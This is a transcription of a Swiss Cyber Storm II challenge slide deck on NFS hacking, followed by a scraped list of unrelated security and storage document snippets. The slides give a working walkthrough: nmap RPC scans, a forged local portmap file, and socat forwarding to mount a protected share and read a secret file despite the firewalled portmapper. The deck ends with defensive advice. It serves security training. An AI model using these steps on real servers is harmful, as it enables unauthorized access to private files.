Swiss Cyber Storm II Case: NFS Hacking
|
|
|
- Jacob Reynolds
- 10 years ago
- Views:
Transcription
1 Swiss Cyber Storm II Case: NFS Hacking Axel Neumann Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel Fax [email protected]
2 What is NFS? Network File System (NFS) is a network file system protocol for UNIX developed by SUN Microsystems Access files over a network as if the network share were attached as a local hard disk NFS is making use of RPCs (Remote Procedure Calls) Accordant file system for Windows: SMB (aka. CIFS) Authentication for NFS g Client-Computer authenticates to NFSv3 (IP Address) g Since NFSv4 User-Authentication is possible (Kerberos) Slide 2
3 Typical NFSv3 Session (simplified) Slide 3
4 Typical NFSv3 Session (simplified) 1. Client connects to Portmapper (Port 111) and asks for Portnumber of the Mount Daemon (mountd) 2. Portmapper returns Portnumber of mountd 3. Client connects to mountd and asks for File-Handle for /knownshareddirectory 4. mountd returns File-Handle 0 5. Client connects to Portmapper and asks for NFS Portnumber (nfsd) 6. Portmapper returns Portnumber of nfsd Slide 4
5 Typical NFSv3 Session (simplified) 8. Client connects to nfsd and executes LOOKUP-routine, using File-Handle 0 and File-/Directory-Name 9. nfsd returns File-Handle 1 for specific File-/Directory-Name 10. Client executes READ-routine, using File-Handle nfsd returns contents of specific File/Directory Portmapper is essential for NFSv3 Slide 5
6 Swiss Cyber Storm NFS Case What is the goal of the case? Get access to the file geheim-5022.txt which is stored on the NFS server What do we know? Server IP: Exact name of share and file: home/geheim/geheim-5022.txt Dump of rcpinfo Slide 6
7 Swiss Cyber Storm NFS Solution Test the NFS server for exported shares bash # showmount e mount clntudp_create: RCP: Port mapper failure RPC: Unable to receive showmount: The command showmount can be used to get information about the shared directories of the NFS server Slide 7
8 Scan the server (TCP) In the second step, we use NMAPs RPC grinder for detecting open RPC ports, RPC program and protocol version (TCP) bash # nmap sr p Starting Nmap 4.62 ( ) at :33 UTC Interesting ports on ubuntu-vm ( ): Not shown: closed ports PORT STATE SERVICE VERSION 111/tcp filtered rpcbind 2049/tcp open nfs 2-4 (rpc #100003) 51979/tcp open nlockmgr 1-4 (rpc #100021) 57543/tcp open mountd 1-3 (rpc #100005) 60644/tcp open status 1 (rpc #100024) MAC Address: 00:0C:29:1D:50:0C (VMware) Nmap done: 1 IP address (1 host up) scanned in seconds Slide 8
9 Scan the server (UDP) Again, we use NMAPs RPC grinder for detecting open RPC ports, RPC program and protocol version (UDP) bash # nmap sur p Starting Nmap 4.62 ( ) at :39 UTC Interesting ports on ubuntu-vm ( ): PORT STATE SERVICE VERSION 68/udp open filtered dhcpc 111/udp closed rpcbind 806/udp open filtered unknown 2049/udp open nfs 2-4 (rpc #100003) 5353/udp open filtered zeroconf 44139/udp open status 1 (rpc #100024) 49456/udp open filtered unknown 52663/udp open nlockmgr 1-4 (rpc #100021) 55545/udp open mountd 1-3 (rpc #100005) MAC Address: 00:0C:29:1D:50:0C (Vmware) Slide 9
10 The Shortcut As you could drink dozens of coffees until the scan would be finished, we take the shortcut program vers proto port tcp 111 portmapper udp status tcp status tcp nlockmgr udp nlockmgr tcp 2049 nfs tcp 2049 nfs tcp 2049 nfs... output shortened Slide 10
11 Portstatus and description rpcbind nlockmgr mountd nfsd status Provides a mapping from a service name to the portnumber it's running on Forwards local file locking requests to the lock manager on the server system The rpc.mountd server provides an ancillary service needed to satisfy mount requests by NFS clients The rpc.nfsd program implements the user level part of the NFS service If an NFS server crashes and comes back alive, rpc.statd can notify clients about that event. As this is only an informational service, it can be neglected for attacking NFS Slide 11
12 Scanning results The scanning revealed the ports that are used by the NFS server Port 111 (portmapper) is closed All other ports used for NFS remain open Assumption: The Administrator just blocked the portmapper s port to deny NFS usage Slide 12
13 NFS without portmapper NFSv3 needs the portmapper to work properly! Does the portmapper have to be on the NFS server itself? Let s try to build our own portmapper service! Slide 13
14 Create your own portmap file Read out Service, Port number, RPC number and Version of the available NFS services PORT STATE SERVICE VERSION 2049/udp open nfs 2-4 (rpc #100003) 52663/udp open nlockmgr 1-4 (rpc #100021) 55545/udp open mountd 1-3 (rpc #100005) 2049/tcp open nfs 2-4 (rpc #100003) 51979/tcp open nlockmgr 1-4 (rpc #100021) 57543/tcp open mountd 1-3 (rpc #100005) Create portfile (portmap.txt) using the information above (Example for Service: nfs) # RPC-NUMBER NFS-VERSION PROTOCOL PORT SERVICE tcp 2049 nfs tcp 2049 nfs tcp 2049 nfs udp 2049 nfs udp 2049 nfs udp 2049 nfs Slide 14
15 Complete portmap file (portmap.txt) # RPC-NUMBER NFS-VERSION PROTOCOL PORT SERVICE tcp 111 portmapper udp 111 portmapper tcp 2049 nfs tcp 2049 nfs tcp 2049 nfs udp 2049 nfs udp 2049 nfs udp 2049 nfs tcp mountd tcp mountd tcp mountd udp mountd udp mountd udp mountd tcp nlockmgr tcp nlockmgr tcp nlockmgr tcp nlockmgr udp nlockmgr udp nlockmgr udp nlockmgr udp nlockmgr Slide 15
16 Using the portmap file Now, start your own local instance of the portmapper using the newly created self-defined portmap file (portmap.txt) bash # portmap bash # pmap_set < portmap.txt Check the local portmapper. When working correctly, it returns the mapping that is defined in the file bash # rpcinfo p program vers proto port tcp 111 portmapper udp status tcp status tcp nlockmgr udp nlockmgr tcp 2049 nfs tcp 2049 nfs tcp 2049 nfs... output shortened Slide 16
17 Tricking the NFS server We now have an own portmapper service. It is only running locally and does not know anything of remote NFS services Our local portmapper has the same configuration as the one that is running on the NFS server To connect, we simply have to configure local port forwarding of the accordant NFS ports using socat, inetd, ssh,... Slide 17
18 Local portmapper Remote NFS Again, look at the scanning results for all detected NFS ports PORT STATE SERVICE VERSION 2049/udp open nfs 2-4 (rpc #100003) 52663/udp open nlockmgr 1-4 (rpc #100021) 55545/udp open mountd 1-3 (rpc #100005) 2049/tcp open nfs 2-4 (rpc #100003) 51979/tcp open nlockmgr 1-4 (rpc #100021) 57543/tcp open mountd 1-3 (rpc #100005) Create local port forwarding to the original NFS server for all ports (In this example, we are using the tool: socat) # nfs service TCP,UDP socat tcp4-listen:2049,fork tcp4-connect: :2049 & socat udp4-listen:2049,fork udp4-connect: :2049 & # mountd service TCP,UDP socat tcp4-listen:57543,fork tcp4-connect: :57543 & socat udp4-listen:55545,fork udp4-connect: :55545 & # nlockmgr TCP,UDP socat tcp4-listen:51979,fork tcp4-connect: :51979 & socat udp4-listen:52663,fork udp4-connect: :52663 & Slide 18
19 Mount remote NFS share Query for the shares of the remote NFS server by using localhost as NFS server bash # showmount e Export list for : /home/geheim * Mount the remote NFS share locally bash # mount t nfs :/home/geheim /mnt Read file bash # cat /mnt/geheim-5022.txt Gratuliere, du hast den NFS Case gelöst! Slide 19
20 Recommendations If you use firewalls, always prefer whitelisting to give access to different services Prefer usage of NFSv4 (Many security enhancements) Slide 20
21 Used software Nmap ( socat ( NFS-Tools ( Portmap ( Slide 21
22 Questions Slide 22
Secure Network Filesystem (Secure NFS) By Travis Zigler
Secure Network Filesystem (Secure NFS) By Travis Zigler Overview of Secure NFS Problems with NFS Security of Basic NFS Configurations Securing NFS with SSH Tutorial Securing NFS with SSL Overview Conclusions
Chapter 11 Distributed File Systems. Distributed File Systems
Chapter 11 Distributed File Systems Introduction Case studies NFS Coda 1 Distributed File Systems A distributed file system enables clients to access files stored on one or more remote file servers A file
Netfilter. GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic. January 2008
Netfilter GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic January 2008 Netfilter Features Address Translation S NAT, D NAT IP Accounting and Mangling IP Packet filtering
We mean.network File System
We mean.network File System Introduction: Remote File-systems When networking became widely available users wanting to share files had to log in across the net to a central machine This central machine
What is included in the ATRC server support
Linux Server Support Services What is included in the ATRC server support Installation Installation of any ATRC Supported distribution Compatibility with client hardware. Hardware Configuration Recommendations
1 Scope of Assessment
CIT 380 Project Network Security Assessment Due: April 30, 2014 This project is a security assessment of a small group of systems. In this assessment, students will apply security tools and resources learned
RPC and TI-RPC Test Suite Test Plan Document
RPC and TI-RPC Test Suite Test Plan Document Cyril LACABANNE Bull S.A.S. Version 1.3 12 July 2007 Revision history Version Description 1.0 First release 1.1 Several correction on 1, 5, 8, 14 1.2 Add first
SoftNAS Application Guide: In-Flight Encryption 12/7/2015 SOFTNAS LLC
SoftNAS Application Guide: In-Flight Encryption 12/7/2015 SOFTNAS LLC SoftNAS Application Guide: In-Flight Encryption Contents Introduction to In-Flight Data Encryption... 2 CIFS Encryption In-Flight...
Storage / SAN / NAS. Jarle Bjørgeengen University of Oslo / USIT. October 18, 2011
Storage / SAN / NAS Jarle Bjørgeengen University of Oslo / USIT October 18, 2011 I m available in room PS223 on Fridays... except those weeks I have lectures other weekdays... like this week. Discuss topics
Allion Ingrasys Europe. NAStorage. Security policy under a UNIX/LINUX environment. Version 2.01
Allion Ingrasys Europe NAStorage Security policy under a UNIX/LINUX environment Version 2.01 Security policy under a UNIX/LINUX environment Start Enabling a Unix/Linux Network (NFS Protocol) Adding a UNIX
Migrating from NFSv3 to NFSv4. Migrating from NFSv3 to NFSv4. March 2011. 1 of 10 2011 STORAGE NETWORKING INDUSTRY ASSOCIATION
Migrating from NFSv3 to NFSv4 Migrating from NFSv3 to NFSv4 March 2011 1 of 10 Table of Contents Introduction... 3 NFSv3 to NFSv4 Considerations... 4 Pseudo Filesystem...4 TCP only; no UDP support...5
Network File System (NFS) Pradipta De [email protected]
Network File System (NFS) Pradipta De [email protected] Today s Topic Network File System Type of Distributed file system NFS protocol NFS cache consistency issue CSE506: Ext Filesystem 2 NFS
NAStorage. Administrator Guide. Security Policy Of NAStorage Under UNIX/LINUX Environment
NAStorage Administrator Guide Security Policy Of NAStorage Under UNIX/LINUX Environment Version 1.00 10/01/2002 Prepared by: Leon Hsu TS Engineer Ingrasys Technology Inc. E-mail: [email protected] UNIX/LINUX
VMware vcenter Log Insight Security Guide
VMware vcenter Log Insight Security Guide vcenter Log Insight 1.5 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by a new
GL254 - RED HAT ENTERPRISE LINUX SYSTEMS ADMINISTRATION III
QWERTYUIOP{ GL254 - RED HAT ENTERPRISE LINUX SYSTEMS ADMINISTRATION III This GL254 course is designed to follow an identical set of topics as the Red Hat RH254, RH255 RHCE exam prep courses with the added
Insecure IP Storage Networks. Presenter: Himanshu Dwivedi Regional Technical Director @stake, Inc.
Insecure IP Storage Networks Presenter: Himanshu Dwivedi Regional Technical Director @stake, Inc. BlackHat 2004 Agenda Insecure Network Attached Storage (NAS) Introduction NAS Protocols NAS Attacks Conclusion
Testing New Applications In The DMZ Using VMware ESX. Ivan Dell Era Software Engineer IBM
Testing New Applications In The DMZ Using VMware ESX Ivan Dell Era Software Engineer IBM Agenda Problem definition Traditional solution The solution with VMware VI Remote control through the firewall Problem
Penetration Testing SIP Services
Penetration Testing SIP Services Using Metasploit Framework Writer Version : 0.2 : Fatih Özavcı (fatih.ozavci at viproy.com) Introduction Viproy VoIP Penetration Testing Kit Sayfa 2 Table of Contents 1
How to Backup XenServer VM with VirtualIQ
How to Backup XenServer VM with VirtualIQ 1. Using Live Backup of VM option: Live Backup: This option can be used, if user does not want to power off the VM during the backup operation. This approach takes
Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology
Port Scanning and Vulnerability Assessment ECE4893 Internetwork Security Georgia Institute of Technology Agenda Reconnaissance Scanning Network Mapping OS detection Vulnerability assessment Reconnaissance
For more information email [email protected] or call 703.749.7723
Vulnerability Assessment Methodology Today s networks are typically comprised of a variety of components from many vendors. This adds to the difficulties faced by the system administration staff, as they
Immotec Systems, Inc. SQL Server 2005 Installation Document
SQL Server Installation Guide 1. From the Visor 360 installation CD\USB Key, open the Access folder and install the Access Database Engine. 2. Open Visor 360 V2.0 folder and double click on Setup. Visor
How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu 3.5.2 (Amd66) On Ubuntu 4.5 On A Windows Box
CSC-NETLAB Packet filtering with Iptables Group Nr Name1 Name2 Name3 Date Instructor s Signature Table of Contents 1 Goals...2 2 Introduction...3 3 Getting started...3 4 Connecting to the virtual hosts...3
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security 560.2. Sans Mentor: Daryl Fallin
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing SANS Security 560.2 Sans Mentor: Daryl Fallin http://www.sans.org/info/55868 Copyright 2010, All Rights Reserved Version 4Q10
CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities
CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities DNS name: turing.cs.montclair.edu -This server is the Departmental Server
Worksheet 3: Distributed File Systems
Worksheet 3 Distributed File Systems Name Class Please complete this worksheet and print it out. Author J.Jackson Objectives This exercise aims to investigate network file structures using various tools.
FILE ARCHIVING FROM NETAPP TO EMC DATA DOMAIN WITH EMC FILE MANAGEMENT APPLIANCE
White Paper FILE ARCHIVING FROM NETAPP TO EMC DATA DOMAIN WITH EMC FILE MANAGEMENT APPLIANCE Abstract This white paper is intended to guide administrators through the process of deploying the EMC File
A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006
IBM TRAINING A43 Modern Hacking Techniques and IP Security By Shawn Mullen Las Vegas, NV 2005 CSI/FBI US Computer Crime and Computer Security Survey 9 out of 10 experienced computer security incident in
Clustered Data ONTAP 8.2
Updated for 8.2.1 Clustered Data ONTAP 8.2 File Access Management Guide for NFS NetApp, Inc. 495 East Java Drive Sunnyvale, CA 94089 U.S. Telephone: +1 (408) 822-6000 Fax: +1 (408) 822-4501 Support telephone:
Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003
http://technet.microsoft.com/en-us/library/cc757501(ws.10).aspx Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 Updated: October 7, 2005 Applies To: Windows Server 2003 with
Firewalls (IPTABLES)
Firewalls (IPTABLES) Objectives Understand the technical essentials of firewalls. Realize the limitations and capabilities of firewalls. To be familiar with iptables firewall. Introduction: In the context
Enabling Active Directory Authentication with ESX Server 1
1 Enabling Active Directory Authentication with ESX Server 1 This document provides information about how to configure ESX Server to use Active Directory for authentication. ESX Server system includes
Review Quiz 1. What is the stateful firewall that is built into Mac OS X and Mac OS X Server?
----------------------------- Chapter 1 PLANNING SYSTEM 1. What is the formal definition of utilization? 2. Name the common units in which heat load is measured. 3. What is the easiest way to determine
Advanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
Network Security. Network Packet Analysis
Network Security Network Packet Analysis Module 3 Keith A. Watson, CISSP, CISA IA Research Engineer, CERIAS [email protected] 1 Network Packet Analysis Definition: Examining network packets to determine
FileBench's Multi-Client feature
FileBench's Multi-Client feature Filebench now includes facilities to synchronize workload execution on a set of clients, allowing higher offered loads to the server. While primarily intended for network
Smart Card APDU Analysis
Smart Card APDU Analysis Black Hat Briefings 2008 Las Vegas Ivan "e1" Buetler [email protected] Compass Security AG - Switzerland Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil
VMware vcenter Log Insight Security Guide
VMware vcenter Log Insight Security Guide vcenter Log Insight 2.0 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by a new
F-SECURE MESSAGING SECURITY GATEWAY
F-SECURE MESSAGING SECURITY GATEWAY DEFAULT SETUP GUIDE This guide describes how to set up and configure the F-Secure Messaging Security Gateway appliance in a basic e-mail server environment. AN EXAMPLE
Red Hat System Administration 1(RH124) is Designed for IT Professionals who are new to Linux.
Red Hat Enterprise Linux 7- RH124 Red Hat System Administration I Red Hat System Administration 1(RH124) is Designed for IT Professionals who are new to Linux. This course will actively engage students
Configuring Windows Server Clusters
Configuring Windows Server Clusters In Enterprise network, group of servers are often used to provide a common set of services. For example, Different physical computers can be used to answer request directed
6WRUP:DWFK. Policies for Dedicated SQL Servers Group
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated SQL Servers Group The sample policies shipped with StormWatch address both application-specific
NAS 224 Remote Access Manual Configuration
NAS 224 Remote Access Manual Configuration Connect to your ASUSTOR NAS through the Internet A S U S T O R C O L L E G E COURSE OBJECTIVES Upon completion of this course you should be able to: 1. Configure
Fifty Critical Alerts for Monitoring Windows Servers Best practices
Fifty Critical Alerts for Monitoring Windows Servers Best practices The importance of consolidation, correlation, and detection Enterprise Security Series White Paper 6990 Columbia Gateway Drive, Suite
RemoteTM LAN Server User Guide
RemoteTM LAN Server User Guide Copyright 2008-2013 Maxprograms Contents 3 Contents Introduction...5 Supported Platforms...5 Requirements...5 LAN Server...7 System Tray Menu...7 Server Status...7 Server
IBM. Vulnerability scanning and best practices
IBM Vulnerability scanning and best practices ii Vulnerability scanning and best practices Contents Vulnerability scanning strategy and best practices.............. 1 Scan types............... 2 Scan duration
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
Five Steps to Improve Internal Network Security. Chattanooga ISSA
Five Steps to Improve Internal Network Security Chattanooga ISSA 1 Find Me AverageSecurityGuy.info @averagesecguy [email protected] github.com/averagesecurityguy ChattSec.org 2 Why? The methodical
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
EXTRA. Vulnerability scanners are indispensable both VULNERABILITY SCANNER
Vulnerability scanners are indispensable both for vulnerability assessments and penetration tests. One of the first things a tester does when faced with a network is fire up a network scanner or even several
Discovery Guide. Secret Server. Table of Contents
Secret Server Discovery Guide Table of Contents Introduction... 3 How Discovery Works... 3 Active Directory / Local Windows Accounts... 3 Unix accounts... 3 VMware ESX accounts... 3 Why use Discovery?...
SWsoft, Inc. Plesk VPN. Administrator's Guide. Plesk 7.5 Reloaded
SWsoft, Inc. Plesk VPN Administrator's Guide Plesk 7.5 Reloaded (c) 1999-2004 ISBN: N/A SWsoft Inc 13800 Coppermine Drive Suite 112 Herndon VA 20171 USA Tel: +1 (703) 815 5670 Fax: +1 (703) 815 5675 Copyright
SMB a protocol example
SMB a protocol example of which one implementation is SaMBa David Morgan SMB Server Message Block an application layer protocol implements file ( resource ) sharing built in to Windows 1 SMB historical
TECHNICAL NOTE 01/02 PROTECTING YOUR COMPUTER NETWORK
TECHNICAL NOTE 01/02 PROTECTING YOUR COMPUTER NETWORK 2002 This paper was previously published by the National Infrastructure Security Co-ordination Centre (NISCC) a predecessor organisation to the Centre
Before deploying SiteAudit it is recommended to review the information below. This will ensure efficient installation and operation of SiteAudit.
SiteAudit Knowledge Base Deployment Check List June 2012 In This Article: Platform Requirements Windows Settings Discovery Configuration Before deploying SiteAudit it is recommended to review the information
finger, ftp, host, hostname, mesg, rcp, rlogin, rsh, scp, sftp, slogin, ssh, talk, telnet, users, w, walla, who, write,...
Read Chapter 9 Linux network utilities finger, ftp, host, hostname, mesg, rcp, rlogin, rsh, scp, sftp, slogin, ssh, talk, telnet, users, w, walla, who, write,... 1 Important to know common network terminology
Scan Report Executive Summary. Part 2. Component Compliance Summary IP Address : 69.43.165.11
Scan Report Executive Summary Part 1. Scan Information Scan Customer Company: Date scan was completed: rsync.net ASV Company: Comodo CA Limited 06-02-2015 Scan expiration date: 08-31-2015 Part 2. Component
How To Manage File Access On Data Ontap On A Pc Or Mac Or Mac (For A Mac) On A Network (For Mac) With A Network Or Ipad (For An Ipad) On An Ipa (For Pc Or
Clustered Data ONTAP 8.3 File Access Management Guide for NFS NetApp, Inc. 495 East Java Drive Sunnyvale, CA 94089 U.S. Telephone: +1 (408) 822-6000 Fax: +1 (408) 822-4501 Support telephone: +1 (888) 463-8277
Project Group High- performance Flexible File System
Project Group High- performance Flexible File System Lecture 3: Network File Systems André Brinkmann Example: SUN NFS NFS (Network File System) is an open protocol to exchange files Developed by Sun Microsystems
CSCI 7000-001 Firewalls and Packet Filtering
CSCI 7000-001 Firewalls and Packet Filtering November 1, 2001 Firewalls are the wrong approach. They don t solve the general problem, and they make it very difficult or impossible to do many things. On
The Nexpose Expert System
Technical Paper The Nexpose Expert System Using an Expert System for Deeper Vulnerability Scanning Executive Summary This paper explains how Rapid7 Nexpose uses an expert system to achieve better results
Codes of Connection for Devices Connected to Newcastle University ICT Network
Code of Connection (CoCo) for Devices Connected to the University s Author Information Security Officer (Technical) Version V1.1 Date 23 April 2015 Introduction This Code of Connection (CoCo) establishes
PRINT CONFIGURATION. 1. Printer Configuration
PRINT CONFIGURATION Red Flag Server5 has improved the designs of the printer configuration tool to facilitate you to conduct print configuration and print tasks management in a more convenient and familiar
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Linux Security Ideas and Tips
Linux Security Ideas and Tips Hugh Brown Sr. Systems Administrator ITS Enterprise Infrastructure University of Iowa October 8, 2014 Hugh Brown (University of Iowa) Linux Security Ideas and Tips October
SolarWinds Log & Event Manager
Corona Technical Services SolarWinds Log & Event Manager Training Project/Implementation Outline James Kluza 14 Table of Contents Overview... 3 Example Project Schedule... 3 Pre-engagement Checklist...
MilsVPN VPN Tunnel Port Translation. Table of Contents...1 1. Introduction...2 2. VPN Tunnel Settings...2
Page 1 of 8 Table of Contents Table of Contents...1 1. Introduction...2 2. VPN Tunnel Settings...2 2.1 VPN Settings...2 2.2 MilsVPN Service Properties...3 3. Service Object Creation...3 4. Firewall rules
Cisco Secure PIX Firewall with Two Routers Configuration Example
Cisco Secure PIX Firewall with Two Routers Configuration Example Document ID: 15244 Interactive: This document offers customized analysis of your Cisco device. Contents Introduction Prerequisites Requirements
GL550 - Enterprise Linux Security Administration
GL550 - Enterprise Linux Security Administration This highly technical course focuses on properly securing machines running the Linux operating systems. A broad range of general security techniques such
Lab 3: Recon and Firewalls
Lab 3: Recon and Firewalls IP, UDP, TCP and ICMP Before we can create firewall rules, we have to know the basics of network protocols. Here's a quick review... IP ICMP UDP TCP The underlying packet delivery
ENTERPRISE LINUX SECURITY ADMINISTRATION
ENTERPRISE LINUX SECURITY ADMINISTRATION COURSE DESCRIPTION: This highly technical course focuses on properly securing machines running the Linux operating systems. A broad range of general security techniques
TELE 301 Network Management. Lecture 17: File Transfer & Web Caching
TELE 301 Network Management Lecture 17: File Transfer & Web Caching Haibo Zhang Computer Science, University of Otago TELE301 Lecture 17: File Transfer & Web Caching 1 Today s Focus FTP & Web Caching!
13. Configuring FTP Services in Knoppix
13. Configuring FTP Services in Knoppix Estimated Time: 45 minutes Objective In this lab, the student will configure Knoppix as an FTP server. Equipment The following equipment is required for this exercise:
Vulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
Computer and Network Security Exercise no. 4
University of Haifa Winter Semester 11/1/12 Computer and Network Security Exercise no. 4 Submit in Pairs/Single to mailbox 19 by 25/1/12, 2:00 p.m. 1. Following the sensitivity of the information in its
Intego Enterprise Software Deployment Guide
Intego Enterprise Software Deployment Guide www.intego.com Intego Enterprise Software Deployment Guide! Page 1 Table of Contents Introduction!... 3 Managing Macs in the Enterprise!... 4 Using Remote Management
CA arcserve Unified Data Protection Agent for Linux
CA arcserve Unified Data Protection Agent for Linux User Guide Version 5.0 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as
Requirements Collax Security Gateway Collax Business Server or Collax Platform Server including Collax SSL VPN module
Collax SSL VPN Howto This howto describes the easy configuration of a Collax server as SSL VPN gateway in order to enable external access to selected applications in the company network. Except for a common
Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006
Reverse Shells Enable Attackers To Operate From Your Network Richard Hammer August 2006 Reverse Shells? Why should you care about reverse shells? How do reverse shells work? How do reverse shells get installed
NETWORK SECURITY WITH OPENSOURCE FIREWALL
NETWORK SECURITY WITH OPENSOURCE FIREWALL Vivek Kathayat,Dr Laxmi Ahuja AIIT Amity University,Noida [email protected] [email protected] ATTACKER SYSTEM: Backtrack 5r3( 192.168.75.10 ) HOST: Backtrack
Syncplicity On-Premise Storage Connector
Syncplicity On-Premise Storage Connector Implementation Guide Abstract This document explains how to install and configure the Syncplicity On-Premise Storage Connector. In addition, it also describes how
GTA SSO Auth. Single Sign-On Service. Tel: +1.407.380.0220 Fax. +1.407.380.6080 Email: [email protected] Web: www.gta.com
GTA SSO Auth Single Sign-On Service SSOAuth200912-01 Global Technology Associates 3505 Lake Lynda Drive Suite 109 Orlando, FL 32817 Tel: +1.407.380.0220 Fax. +1.407.380.6080 Email: [email protected] Web: www.gta.com
Introduction of Intrusion Detection Systems
Introduction of Intrusion Detection Systems Why IDS? Inspects all inbound and outbound network activity and identifies a network or system attack from someone attempting to compromise a system. Detection:
60467 Project 1. Net Vulnerabilities scans and attacks. Chun Li
60467 Project 1 Net Vulnerabilities scans and attacks Chun Li Hardware used: Desktop PC: Windows Vista service pack Service Pack 2 v113 Intel Core 2 Duo 3GHz CPU, 4GB Ram, D-Link DWA-552 XtremeN Desktop
SCADA Security Example
SCADA Security Example Christian Paulino and Janusz Zalewski Florida Gulf Coast University December 2012 1. Introduction SCADA systems are always connected to a network, so they are vulnerable to attack.
File Transfer Examples. Running commands on other computers and transferring files between computers
Running commands on other computers and transferring files between computers 1 1 Remote Login Login to remote computer and run programs on that computer Once logged in to remote computer, everything you
VPNSCAN: Extending the Audit and Compliance Perimeter. Rob VandenBrink [email protected]
VPNSCAN: Extending the Audit and Compliance Perimeter Rob VandenBrink [email protected] Business Issue Most clients have a remote access or other governing policy that has one or more common restrictions
Linux NFS HOWTO. Tavis Barr. Nicolai Langfeldt. Seth Vidal. Tom McNeal. tavis dot barr at liu dot edu. janl at linpro dot no
Tavis Barr tavis dot barr at liu dot edu Nicolai Langfeldt janl at linpro dot no Seth Vidal skvidal at phy dot duke dot edu Tom McNeal trmcneal at attbi dot com 2002 08 25 Revision History Revision v3.1
Firewall Firewall August, 2003
Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also
Network Attached Storage. Jinfeng Yang Oct/19/2015
Network Attached Storage Jinfeng Yang Oct/19/2015 Outline Part A 1. What is the Network Attached Storage (NAS)? 2. What are the applications of NAS? 3. The benefits of NAS. 4. NAS s performance (Reliability
